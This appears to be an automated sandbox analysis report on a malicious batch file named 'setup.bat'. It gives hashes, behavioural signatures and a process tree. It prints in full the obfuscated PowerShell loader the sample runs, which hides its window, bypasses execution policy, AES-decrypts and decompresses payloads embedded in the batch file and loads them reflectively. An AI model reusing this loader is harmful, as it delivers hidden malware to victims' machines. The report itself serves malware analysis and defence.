Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-09-2024 19:41
Static task
static1
Behavioral task
behavioral1
Sample
setup.bat
Resource
win7-20240903-en
windows7-x64
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
setup.bat
Resource
win10v2004-20240802-en
windows10-2004-x64
15 signatures
150 seconds
General
-
Target
setup.bat
-
Size
404KB
-
MD5
9db3f50ff13bf46f2aa952160a404c35
-
SHA1
cf542c18647dd49e3c61dabf00895efd52c0f857
-
SHA256
11866a707b12980538131fcc50a8b061f8d118010d300118d62e0ec6cad3c879
-
SHA512
7a36795eb22838ea680f641adb19cb67b629738907c853819c54dd7b897d22ce3093c38db7591bf7b19dde076736cc2980d873c90a2b387c85e0ccef6d1c040e
-
SSDEEP
6144:Otesj88+sJdbUapt7Ouogzhklx0A1XzGPpQMeB4Hn8bYnXBLyFEqB:Oosj881D5pty1goxMmMeBmnXZtqB
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1976 powershell.exe -
Deletes itself 1 IoCs
pid Process 1352 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1976 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1352 wrote to memory of 1928 1352 cmd.exe 31 PID 1352 wrote to memory of 1928 1352 cmd.exe 31 PID 1352 wrote to memory of 1928 1352 cmd.exe 31 PID 1928 wrote to memory of 1632 1928 net.exe 32 PID 1928 wrote to memory of 1632 1928 net.exe 32 PID 1928 wrote to memory of 1632 1928 net.exe 32 PID 1352 wrote to memory of 1976 1352 cmd.exe 33 PID 1352 wrote to memory of 1976 1352 cmd.exe 33 PID 1352 wrote to memory of 1976 1352 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\setup.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:1632
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9DJSm0AohhIMRRCWkU8l6CaMamly9vtcPv5rDkEhIro='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hi+1JGCLBPHBkIKg8D99IQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MnEKr=New-Object System.IO.MemoryStream(,$param_var); $fPQys=New-Object System.IO.MemoryStream; $QTwgq=New-Object System.IO.Compression.GZipStream($MnEKr, [IO.Compression.CompressionMode]::Decompress); $QTwgq.CopyTo($fPQys); $QTwgq.Dispose(); $MnEKr.Dispose(); $fPQys.Dispose(); $fPQys.ToArray();}function execute_function($param_var,$param2_var){ $bSnbv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dZVYy=$bSnbv.EntryPoint; $dZVYy.Invoke($null, $param2_var);}$DBNvw = 'C:\Users\Admin\AppData\Local\Temp\setup.bat';$host.UI.RawUI.WindowTitle = $DBNvw;$Iguao=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DBNvw).Split([Environment]::NewLine);foreach ($EalWz in $Iguao) { if ($EalWz.StartsWith(':: ')) { $JcKdc=$EalWz.Substring(3); break; }}$payloads_var=[string[]]$JcKdc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-